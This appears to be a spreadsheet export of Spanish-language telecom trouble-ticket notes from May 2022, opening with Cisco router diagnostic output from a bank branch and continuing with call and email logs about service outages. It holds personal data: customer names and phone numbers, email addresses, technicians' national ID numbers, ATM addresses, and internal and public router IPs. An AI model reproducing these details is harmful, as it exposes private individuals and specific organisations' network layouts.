FASTETHERNET3              UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0           UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET1           10.174.168.79   YES NVRAM  UP                    UP
LOOPBACK5                  10.212.176.35   YES NVRAM  UP                    UP
NVI0                       10.212.176.35   YES UNSET  UP                    UP
VLAN1                      181.209.219.137 YES NVRAM  UP                    UP
CC_BANRURAL_GT_INTERNET_AGENCIA_0723#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.168.65           0   B443.2600.D755  ARPA   GIGABITETHERNET1
INTERNET  10.174.168.79           -   501C.BFDE.D225  ARPA   GIGABITETHERNET1
INTERNET  181.209.219.137         -   501C.BFDE.D220  ARPA   VLAN1
INTERNET  181.209.219.138         0   INCOMPLETE      ARPA
INTERNET  192.168.1.1             -   501C.BFDE.D220  ARPA   VLAN1
INTERNET  192.168.1.214           0   9818.8841.3F75  ARPA   VLAN1
CC_BANRURAL_GT_INTERNET_AGENCIA_0723#SHO VER
CISCO IOS SOFTWARE, C860 SOFTWARE (C860VAE-ADVSECURITYK9-M), VERSION 15.2(4)M6, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 19-MAR-14 18:40 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.1(4R)M2, RELEASE SOFTWARE (FC1)
CC_BANRURAL_GT_INTERNET_AGENCIA_0723 UPTIME IS 1 DAY, 22 HOURS, 37 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON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81400W7
1 DSL CONTROLLER
1 ETHERNET INTERFACE
4 FASTETHERNET INTERFACES
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
57344K BYTES SYSTEM FLASH ALLOCATED
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_INTERNET_AGENCIA_0723#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FASTETHERNET3                 0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0              0         0         0         0      5000         3      2000         3         0
* GIGABITETHERNET1              0         0         0         0      7000        12      9000         7         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* NVI0                          0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0         0      2000         2      2000         2         0
CC_BANRURAL_GT_INTERNET_AGENCIA_0723#</t>
  </si>
  <si>
    <t>F4565193</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AMILCAR RAMOS 42186033 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001756974</t>
  </si>
  <si>
    <t>F4565196</t>
  </si>
  <si>
    <t>SE LLAMA ACLIETNE BESSY CUCHILLAS-77304074  ## VIVO ##  COMENTA QUE SU PROVEEDOR LLLEGARA MAÑANA PERO PIDE SE CERTIFIQUE SERVICIO, PARA SERVICIORARSE QUE EL PROBLEMA NO ES DE CLARO ##CLIENTE SOLICITA VIISITA DE CERTIFICACION HOY A LAS 13_30 HORAS ##</t>
  </si>
  <si>
    <t>SE TEIENE A CLIENTE EN LINEA- INDINCA QUE EL PROBLEMAM QUE ESTA REPORTANDO ES CAIDA TOTAL- CLIENTE VERIFICARA EQUIPO PBX DEBIDO A QUE NO POSEE LLAMADAS ENTRANTES, SALIENTES NI ENTRE EXTENSIONES + VERIFICARA EQUIPO TPLINK- ##PIDE SE LE MARQUE EN 1 HORA ##VIVO</t>
  </si>
  <si>
    <t>F4565207</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE FATIMA QUIEN INDICA QUE ESTAN TRABAJANDO DESDE CASA Y QUE NO PUEDEN LLEGAR EL DIA DE HOY A REVISAR EL EQUIPO SI NO HASTA EL DIA DE MAÑANA A PARTIR DE LAS 9;00AM. ELLA VA A ESTAR LLEGANDO A REINCIAR EL EQUIPO.
2001758845
COLA:
NOMBRE: A: 0050377079240
NÚMERO: 0050377079240
DURACIÓN: 0:00:45
ESTADO: CONECTADA
DETALLES: 0050377079240
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 16:28:43</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE IRWIN CORTEZ, PERO NO CONTESTA.
2001758028, 2001758474, 2001758683
COLA:
NOMBRE: A: 0050372270195
NÚMERO: 0050372270195
DURACIÓN: 0:00:32
ESTADO: MARCANDO
DETALLES: 0050372270195
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 16:26:10</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE IRVIN CORTEZ/FATIMA 72270195 / 77079240 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t xml:space="preserve"> CLIENTE FATIMA SE ENCUENTRA UBICANDO LOS EQUIPOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NOS CONFIRMA SERVICIO RESTABLECIDO, NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4565216</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
LUN 16/05/2022 3:45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991¿¿¿¿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5216¿¿
ID: 47501637T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1991
UBICADO EN:
CAJERO 1991 SUPER 24 ESCUINTLA 2 CANTON PUENTE DE PALO LOTE 9 KM.60.42 CARR ESCUINTLA PUERTO QUETZAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.</t>
  </si>
  <si>
    <t>F4565217</t>
  </si>
  <si>
    <t>SE LLAMA AC LEITNE FRANCISCO SURIA-78385793 ##VIVO ## SE TIENE EN LINEA ##</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA SE HABLO CON EL CLIENTE STEPHANIE MARTINEZ.
QUIEN INDICA QUE HABIA UN PROBLEMA CON LAS BATERIAS DE LA PBX. PERO YA QUEDO SOLVENTADO AUTORIZA EL CIERRE.</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A LCIENTE 2 VECES STEPHANIE MARTINEZ-75550408 ##ENVIA A BUZON ##VIVO
NOTA: ACTUALMENTE EL SERVICIO SE OBSERVA ACTIVO, PERO CLIENTE NO CONTESTA, LLAMAAS NO COMPLETAN, POSIBLMENTE PBX ESTE INHIBIDA##</t>
  </si>
  <si>
    <t>SERVICIO SE OBSERVA UP- CLIENTE VERIFICARA SI YA APLICARON REINICIO A SU PBX- ## PIDE SE LE MARQUE EN 30 MINUTOS ##VIVO</t>
  </si>
  <si>
    <t>SE HA LLAMADO A CLIENTE 3 VECES STEPHANIE MARTINEZ-75550408 ##ENVIA A BUZON ##VIVO</t>
  </si>
  <si>
    <t>F4565254</t>
  </si>
  <si>
    <t>SE LLAMA A LESBIA EJECUTIVA  42175601 PARA VALIDAR SI ES POSIBLE GESTIONAR CAMBIO DE IP PUBLICAS A SOLICITUD DE CLIENTE SIN EMBARGO NO RESPONDE---</t>
  </si>
  <si>
    <t>SEGÚN CRONOLOGÍA EN LA FALLA COMENTA QUE SE ESTÁN CONTACTANDO CON EL EJECUTIVO PARA LA  SOLICITUD DE CAMBIO DE IP PUBLICA A SOLICITUD DEL CLIENTE POR LOS DETALLES YA MENCIONADOS EN CRONOLOGÍA. PERO NO HAY SEGUIMIENTO, SE CONTACTA CON EL EJECUTIVO ELDER FLORES  AL 55352323 ID 2001955521 / 2001955701 PERO NO RESPONDE, POR LO QUE SE LE LLAMA AL GESTOR  RAMOS.MARLON PARA VALIDAR EL ESTADO DEL TICKET SE CONTACTA AL 8126 ID 2001956080 ATIENDE MIGUEL RODRIGUEZ QUIEN SE LE COMENTA Y NOTIFICA QUE LO CAMBIARA DE ESTADO YA QUE NO APLICA PC POR LO QUE SE MUEVE Y ESTA PENDIENTES CERRAR CON LA SD Y DAR SEGUIMIENTO CON EL EJECUTIVO ELDER FLORES.</t>
  </si>
  <si>
    <t>**SE LLAMA A LESBIA EJECUTIVA  AL 42175601  INDICA QUE ELLA NO ES LA EJECUTIVA QUE EL EJECUTIVO ES ELDER FLORES Y EL NUMERO ES 55352323 **
ID 2001937934
**</t>
  </si>
  <si>
    <t>F4565284</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILLIAM RAMOS AL 61020499 CLIENTE INDICA QUE NO ESTA EN SITIO SOLICITA QUE SE LE LLAME EN 15 MIN NUEVAMENTE **
ID 2001763677
**</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE WILLIAM RAMOS 61020499 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001774414</t>
  </si>
  <si>
    <t>F4565293</t>
  </si>
  <si>
    <t>SE LLAMA  MARLON ALVARENGA 22023100, SEÑORITA QUE ATIENDE NO SABE SOBRE EL REPORTE. SE PASA A PC Y SE BUSCARÁ  CONTACTAR AL CLIENTE PARA SABER SOBRE EL REPORTE. CASO ABIERTO POR DEFAULT. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4565324</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ELMER PERO NO RESPONDE ENVIA A BZON--
56148620</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LMER MARROQUÍN 56148620 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001009110</t>
  </si>
  <si>
    <t>F4565327</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN SOLORZANO AL 8685 7653 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
ID 2001844168
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN SOLORZANO AL 8685 7653 SIGUE SIN RESPONDER , ENVIA A BUZON SE INTENTARA LUEGO**
ID 2001934467
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN SOLORZANO AL 8685 7653 SIGUE SIN RESPONDER , ENVIA A BUZON SE INTENTARA LUEGO**
ID 2001954374
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN SOLORZANO AL 8685 7653 SIGUE SIN RESPONDER , ENVIA A BUZON SE INTENTARA LUEGO**
ID 2001858011
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN SOLORZANO AL 8685 7653 NO RESPONDE, NUMERO DESCONECTADO SE INTENTARA LUEGO**
ID 2001992198 - 2001992218
**</t>
  </si>
  <si>
    <t>F4565329</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA SALVA TIERRA AL 36806562 CLIENTE NO RESPONDE SE INTENTARA LUEGO **
ID 2001992712 - 2001992718
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA SALVA TIERRA AL 36806562 CLIENTE NO RESPONDE ENVIA DIRECTO A BUZON SE INTENTARA LUEGO **
ID 2001936601
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA SALVA TIERRA AL 36806562 CLIENTE NO RESPONDE SE INTENTARA LUEGO **
ID 2001845008
**</t>
  </si>
  <si>
    <t>F4565348</t>
  </si>
  <si>
    <t>|| SE ENVIA CLIENTE SOLICITANDO ACCESOS PARA VISITA MAÑANA MARTES A LAS 10 HRS || PENDIENTE CONFIRMACIÓN
ERITO FERNANDO TECU XITUMUL
ASUNTO: GESTION DE PERMISOS VISITA TÉCNICA ID1383054SV || ESAT S.A DE C.V || CAMINO AL SITIO DEL NIÑO
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID1383054SV || ESAT S.A DE C.V || UBICADO EN: CARRETERA LLEGANDO AL BYPASS NUEVO GASOLINERA 1 AL VOLCAN CAMINO AL SITIO DEL NIÑO. SOLICITAMOS NOS APOYEN GESTIONANDO ACCESOS PARA PERSONAL TÉCNICO QUE ESTARÁ ATENDIENDO VISITA EL DÍA DE MAÑANA MARTES 17/05 A PARTIR DE LAS 10:00 HRS.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL ASIGNADO.
DUI                       IBM      NOMBRE
01320096-0     9401   OSCAR RENE VIDES
00354722-1     4378   RONAL MOREL CRESPIN
00936126-7     4799   MARIO ERNESTO CRUZ MARQUEZ
QUEDAMOS ATENTOS A SU CONFIRMACIÓN PARA PROCEDER.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4565364</t>
  </si>
  <si>
    <t>SEGÚN CRONOLOGÍA DE FALLA NO HAY NADA PENDIENTES POR PARTE DEL CLIENTE POR TAL RAZON SE MUEVE EL TICKET Y SE NOTIFICA AL GESTOR RAMOS.MARLON VIA SKYPE, SI EN CASO HAY ALGO PENDIENTE NOTIFICARLO PARA NO PASARLO A WIP.</t>
  </si>
  <si>
    <t>SE CONVERSA CON WILLIAM ALEJANDRO SANTIZO LÓPEZ, INDICA QUE  EN ESTE MOMENTO NO PUEDE VALIDAR Y QUE SE LE LLAME DENTRO DE 20 MINUTOS
2001996891
COLA:
NOMBRE: A: 34709985
NÚMERO: 34709985
DURACIÓN: 0:01:12
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 34709985
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 17/05/2022 16:05:10</t>
  </si>
  <si>
    <t>F4565378</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL SOLICITANDO VALIDAR --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 17 DE MAYO DE 2022 01:31
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: C128 - ENLACES DATOS CLARO - CON IID¿S 625900183; ID 38300617
BUENOS DÍAS ESTIMADO SR. REYES.
                PODRÍA APOYARNOS VALIDANDO EL FUNCIONAMIENTO ACTUAL Y DE SER POSIBLE INDICARNOS SI PODRÍAMOS CERRAR NUESTROS TICKETS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4565379</t>
  </si>
  <si>
    <t>**SE LLAMA  CLIENTE DAYRIN ESTEFANI QUIROA AL 58008464 SE CONTACTA Y SE DEJA EN LINEA CON GESTOR**
ID 2001846621 - 2001848267
**</t>
  </si>
  <si>
    <t>F4565380</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 INDICA QUE ESTA EN UNA REUNION QUE SE LE LLAME A LAS 11:00 AM EN ADELANTE **
ID 2001849425
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 NO RESPONDE SE INTENTARA LUEGO **
ID 2001993417 - 2001993514
**</t>
  </si>
  <si>
    <t>F4565394</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE JOSE CHAMIER 58749333  VALIDA EL SERVICIO. SE PROCEDE AL CIERRE DEL CASO. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 22266707 LLAMDA COMPLETA, SE SOLICITA HABLAR CON EL SEÑOR JOSE CHAMIER, DEJAN LLAMADA EN ESPERA. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4565397</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL KEVIN LEAL AL 52121782  INDICA QUE NO SE ENCUENTRA EN EL SITIO QUE SE LE LLAME A LA SEÑORITA ROCIO AL 41063909 PERO DE 8:00 AM EN ADELANTE**
LLAMADA DESDE HERRAMIENTA VIVO
**</t>
  </si>
  <si>
    <t>SE ESCALÓ CON JORGE MIRANDA/ PLEX REGIÓN 58265961 INDICA QUE SE DIRIGE A CLIENTE, ESTIMA QUE ESTÉ POR AHÍ EN UNOS 35 MINUTOS, ADICIONAL PIDE SE LE APOYE CON DATOS DE RED DE CLIENTE, SE INFORMA A GESTIÓN N1 VÍA SKYPE DE LO ANTERIOR.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROCIO AL 41063909  CONFIRMA QUE TIENE CONEXION HACIA INTERNET, SE LE INFORMA QUE SE ENVIARA PERSONAL TECNICO PARA CONFIGURAR EL EQUIPO CTC DE MANERA LOCAL YA QUE DE MANEREA REMOTA NO SE LOGRO INGRESAR.</t>
  </si>
  <si>
    <t>F4565398</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CESAR RODRIGUEZ AL 31736397 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
LLAMADA DESDE HERRAMIENTA VIVO
**</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE CESAR RODRIGUEZ 31736397  QUIEN SOLICITA SE PUEDA COLOCAR EN CONFERENCIA A ISAIAS - 33298826, MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001900575 - 2001901497</t>
  </si>
  <si>
    <t>F4565399</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO GESTION DE ACCESO A PERSONAL TECNICO.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 20:13PARA: AJONATHAN@GALILEO.EDU &lt;AJONATHAN@GALILEO.EDU&gt;; HG5997587@GMAIL.COM &lt;HG5997587@GMAIL.COM&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: 406400004T || UNIVERSO OPTICO S.A. || CONDADO NARANJO
BUENAS NOCHES ESTIMADO CLIENTE,
DANDO SEGUIMIENTO A LA FALLA REPORTADA DE CLIENTE UNIVERSO OPTICO S.A. CON ID 406400004T UBICADO EN 14 AVENIDA 9-20 ZONA 4 MIXCO CONDADO EL NARANJO LOCAL 3, SE REQUIERE SE PUEDAN GESTIONAR PERMISOS DE ACCESO PARA EL PERSONAL QUE PODRÍA SER ASIGNADO PARA LA ATENCIÓN DE LA FALLA, SE ADJUNTA DICHO LISTADO EN ESTE CORREO, AL MOMENTO DE TENER GESTIONADOS LOS PERMISOS DE ACCESO FAVOR RESPONDER POR ESTE MEDIO DE ESTA FORMA PROCEDER AL ENVÍO DE PERSONAL TÉCNICO A LA ATENCIÓN Y REPARACIÓN DE LA FALLA. ASÍ TAMBIEN SE REQUIERE SOLICITAR AL CENTRO COMERCIAL PERSONAL DE RED ÓPTIMA PARA QUE ACOMPAÑEN EN CASO DE QUE SEA NECESARIO REVISAR EL CABLEADO INTERNO DEL CENTRO COMERCIAL. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
NOMBRE                                                                            DPI
IVAN ARRAZOLA                                                         2319 45019 0101
EDY ESCALANTE                                                            1981 17108 0101
JOSE ANGEL SANDOVAL                                            1796 76350 0101
RENE CAMEROS COJON                                            2275 16001 0101
HECTOR ROLANDO ALINAN PORON                       2360 72870 0208
BYRON CUTZAL                                                            1689 67987 0101
WILSON WILFREDO ECHEVERRIA                             2592 44201 0101
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE EDWING PEREZ 42933782 QUIEN INDICA QUE EL TURNO DE EL ES ROTATIVO QUE SE AGREGUE EL CONTACTO DEL DR JONATHAN CRUZ AJONATHAN@GALILEO.EDU   TELEFONO 36209659 JONATHAN CRUZ QUIEN SIEMPRE SE ENCUENTRA EN EL LUGAR, SE LE INDICA QUE SE DEBE GESTIONAR PERMISOS DE ACCESO POR PARTE DE ELLOS HACIA LA ADMINISTRACIÓN DEL CENTRO COMERCIAL, SE LE INDICA QUE SE LE ENVIARA UN CORREO PARA QUE SE GESTIONEN LOS PERMISOS DE ACCESO COMO QUE SOLICITEN LA PRESENCIA DE PERSONAL DE RED OPTIMA PARA LA ATENCIÓN DE LA FALLA.</t>
  </si>
  <si>
    <t>*** SE ENVÍA NUEVAMENTE CORREO A CLIENTE, A LA ESPERA DE QUE NOS CONFIRME ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 7:44
PARA: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; AJONATHAN@GALILEO.EDU &lt;AJONATHAN@GALILEO.EDU&gt;; HG5997587@GMAIL.COM &lt;HG5997587@GMAIL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: 406400004T || UNIVERSO OPTICO S.A. || CONDADO NARANJO
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, QUEDAMOS  LA ESPERA DE SUS COMENTARIOS PARA PODER REALIZAR LA COORDINACIÓN DE LA VISITA TÉCNICA.
CUALQUIER DUDA QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN SANDOVAL AL 55556944 NO RESPONDE, SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS**
LLAMADA DESDE HERRAMIENTA VIVO
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN SANDOVAL AL 55556944 SOLICITA QUE SE LE LLAME EN 10 MIN PARA CONFIRMAR SI YA TIENE LOS ACCESOS YA QUE HASTA EL MOMENTO AUN NO LE HAN CONFIRMADO**
ID 2001827009
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN SANDOVAL AL 55556944 CLIENTE INFORMA QUE YA ESTAN AUTORIZADOS LOS ACCESOS QUE SE PUEDE PRESENTAR EL PERSONAL TECNICO**
ID 2001833442
**</t>
  </si>
  <si>
    <t>F4565406</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN SE LE COMENTA QUE VISITA ESTA PROGRAMADA PARA EL DIA DE MAÑANA A LAS 8:00 AM, MENCIONA QUE NO ES NECESARIO LOS PERMISOS SOLO LLAMAR ANTES PARA PODER INGRESAR
2001791652
COLA:
NOMBRE: A: 0050370070421
NÚMERO: 0050370070421
DURACIÓN: 0:01:11
ESTADO: CONECTADA
DETALLES: 0050370070421
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 16/05/2022 19:09:23</t>
  </si>
  <si>
    <t>F4565407</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE MANUEL BERMUDEZ 47045221 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001852317</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MANUEL BERMUDEZ 47045221, PERO INDICA QUE YA SE ESTA RETIRANDO DEL PUNTO REMOTO Y SOLICITA LLAMADA EL DIA DE MAÑANA A LAS 9:00 AM
2001782921
COLA:
NOMBRE: A: 47045221
NÚMERO: 47045221
ESTADO: CONECTADA
DURACIÓN: 0:00:50
DETALLES: 47045221
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 16/05/2022 18:04:26</t>
  </si>
  <si>
    <t>F4565413</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE PARA QUE ESTE ENTERADO DE LOS TECNICOS QUE LLEGARAN EL DIA DE MAÑANA A SUS INSTALACIONES.
DE: HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 19:21
PARA: V-JIRIAS@OPC.HN &lt;V-JIRIAS@OPC.HN&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: SD1126173 OPERADORA DE PUERTO CORTES 2564-6770
BUENAS NOCHES POR ESTE MEDIO SOLICITO EL INGRESO A SUS INSTALACIONES PARA REVISION DE LA LINEA 25646770.
PARA EL DIA DE MAÑANA A PARTIR DE LAS 8:00AM.
PARA LOS SIGUIENTES TECNICOS:
COMPAÑÍA: SEL
OSCAR ALEJANDRO PAZ 0501-2000-11392
HUGO PINEDA                 0501-2000-09002
JOHN RAMOS                  0501-1995-07643
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA INFORMACION AL CLIENTE A LA ESPERA DE LA CONFIRMACION
MONICA YIREH CASTILLO POON
BUENA TARDE ESTIMADO,
LE COMENTAMOS QUE EL DÍA DE AYER SE PERDIÓ LA CONEXIÓN HACIA EL MODEM DE FIBRA ÓPTICA QUE SE ENCUENTRA EN LAS INSTALACIONES, SEGÚN NOTIFICACIÓN DE PERSONAL, SE TUVIERON PROBLEMAS DE ENERGÍA DE LADO DE LA CENTRAL.
QUEDAMOS ATENTOS A SU CONFIRMACIÓN PARA PROCEDER CON EL CIERRE DE TICKET.
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSE ANTONIO QUIEN INDICA QUE NO HAY ACCESO A LAS OFICINAS EL DIA DE HOY, HASTA EL DIA DE MAÑANA A LAS 8:00AM
SOLICITA QUE SE LE ENVIE UN CORREO CON LOS NOMBRES DE LOS TECNICOS Y LA EMPRESA ASGINADA.
FAVOR DE LLEVAR OTRO EQUIPO IMC.
2001789926
COLA:
NOMBRE: A: 0050497800818
NÚMERO: 0050497800818
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 0050497800818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/05/2022 18:54:39</t>
  </si>
  <si>
    <t>F4565415</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL AREA DE MOITOREO DE CAJEROS, RESPONDE HECTOR QUIEN ME INDICA QUE HOY TUVO MANTENIMIENTO EL CAJERO, SE LE COMENTEA QUE SE TIENE MUCHAS REINCIDENCIAS POR POSIBLE PROBLEMA DE ENERGIA, ME INDICA QUE EL CAJERO DEBERIA CONTAR CON UPS PERO SE ENVIARA TECNICO PARA QUE NOS APOYE CON VALIDARLO Y SI ESTAN EN CORRECTO FUNCIONAMIENTO.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 16:59
FIN: HOY, 17:07
DURACIÓN: 7:58
ID DE LLAMADA: 3001014689</t>
  </si>
  <si>
    <t>SE ENVIA CORROE AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MARTES, 17 DE MAYO DE 2022 17:3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927
BUENA TARDE ESTIMADOS
SOLICITAMOS SU APOYO PARA QUE SE ENVIÉ A SUPERVISOR AL CAJERO Y SE VALIDE SI SE TIENE UPS Y SI ESTÁN EN CORRECTO FUNCIONAMIENTO YA QUE SE TIENE DEMASIADA REINCIDENCIA, APARTE PODER VALIDAR QUE LOS EQUIPOS ESTÉN BIEN CONECTADOS.
SE ADJUNTA GRAFICA DEL 1 DE MAYO AL 16 DE MAYO.
TICKET: F4565415
ID: 806300024T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM927
UBICADO EN: ATM 927) MINISTERIO DE COMUNICACIONES - 15 CALLE Y 8 AV. INTERIOR FINCA LA AURORA Z. 13
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.  SALUDOS.</t>
  </si>
  <si>
    <t>F4565417</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL INDICANDO LA OPERATIVIDAD DESCRITA POR CNOC Y SOLICITANDO VALIDAR DE NUEVO --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 17 DE MAYO DE 2022 00:39
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: HELPDESK@CAMPERO.COM; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;
ASUNTO: RE: FALLAS CON SERVICIO TELEFÓNICO CMI ALIMENTOS E1 2277-1600.
